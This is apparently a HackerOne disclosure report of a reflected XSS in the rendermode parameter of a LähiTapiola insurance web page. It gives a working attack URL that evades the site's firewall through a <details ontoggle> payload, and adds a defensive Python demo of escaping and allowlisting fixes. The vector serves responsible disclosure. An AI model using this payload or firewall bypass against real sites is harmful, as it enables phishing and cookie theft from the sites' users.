LocalTapiola: Reflected XSS Vulnerability in https://www.lahitapiola.fi/cs/Satellite

2018-01-01T20:16:24
ID H1:301680
Type hackerone
Reporter teemuk
Modified 2018-04-11T06:34:46

Description

Basic report information

Summary: Reflected XSS vulnerability in https://www.lahitapiola.fi/cs/Satellite.

Description: There is a reflected XSS vulnerability in https://www.lahitapiola.fi/cs/Satellite?pagename=TAMaster/FW_BlogAsset/FW_Nav. The value of the query string parameter rendermode is not properly escaped when it is output to the page. The web application firewall (WAF) appears to block the majority of the simplest XSS vectors, but it can be bypassed by using the ontoggle event of the <details> HTML element. The JavaScript used to demonstrate the vulnerability is location.href="https://www.google.com/?q="+document.domain. This demonstrates an open-redirect style of impact, where the user's browser is redirected to an attacker-controlled page that can e.g. be used for phishing.

Domain: www.lahitapiola.fi

Browsers / Apps Verified In:

  • Firefox version 57.0.3

Steps To Reproduce:

Access the attack URL https://www.lahitapiola.fi/cs/Satellite?pagename=TAMaster/FW_BlogAsset/FW_Nav&rendermode=preview"><details%20open=true%20ontoggle=%27location.href="https://www.google.com/?q="%2Bdocument.domain%27><summary>testing</summary></details>

The browser is redirected to https://www.google.com/?q=www.lahitapiola.fi.
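As an added defender-side illustration (not code from the report or from Oracle WebCenter Sites), the following Python models the reflection described above with a hypothetical template: one version writes rendermode into an attribute unescaped, one applies HTML attribute encoding, and one allowlists the value. A small parser-based audit shows that only the unescaped version lets the reported payload open a new element carrying an event handler.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Reproduction URL copied from the report (the only page-specific value used here).
REPORT_URL = (
    "https://www.lahitapiola.fi/cs/Satellite?pagename=TAMaster/FW_BlogAsset/FW_Nav"
    '&rendermode=preview"><details%20open=true%20ontoggle=%27location.href='
    '"https://www.google.com/?q="%2Bdocument.domain%27><summary>testing</summary></details>'
)

def rendermode_from_url(url: str) -> str:
    """Extract the decoded rendermode parameter the way a server-side handler would."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("rendermode", [""])[0]

def render_vulnerable(rendermode: str) -> str:
    """Hypothetical template (assumption, not the real one) that reflects the value unescaped."""
    return f'<div class="fw-nav" data-rendermode="{rendermode}">...</div>'

def render_hardened(rendermode: str) -> str:
    """Same template with attribute-context encoding: & < > \" and ' are all escaped."""
    return f'<div class="fw-nav" data-rendermode="{html.escape(rendermode, quote=True)}">...</div>'

def render_allowlisted(rendermode: str) -> str:
    """Stricter option: only known modes are accepted, anything else falls back to a default."""
    mode = rendermode if rendermode in {"live", "preview"} else "live"
    return f'<div class="fw-nav" data-rendermode="{mode}">...</div>'

class _TagAudit(HTMLParser):
    """Collects every start tag and every on* attribute name the browser would see."""
    def __init__(self):
        super().__init__()
        self.tags, self.event_handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.event_handlers += [name for name, _ in attrs if name.startswith("on")]

def audit(rendered: str) -> dict:
    """Return the tags and event-handler attributes present in a rendered fragment."""
    parser = _TagAudit()
    parser.feed(rendered)
    parser.close()
    return {"tags": parser.tags, "event_handlers": parser.event_handlers}

if __name__ == "__main__":
    value = rendermode_from_url(REPORT_URL)
    print("unescaped :", audit(render_vulnerable(value)))
    print("escaped   :", audit(render_hardened(value)))
    print("allowlist :", audit(render_allowlisted(value)))
```

The allowlist variant is the stronger fix when the parameter has a closed set of legitimate values, but output encoding is still required for any value that must be reflected verbatim.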

Additional material

  • N/A

Related reports, best practices

This vulnerability is related to the previously reported Oracle WebCenter Sites vulnerabilities (e.g. #170532).

Impact

An attacker can use reflected XSS vulnerabilities to inject content into pages served from www.lahitapiola.fi. This can be used e.g. for phishing purposes or to steal cookies from the user's browser.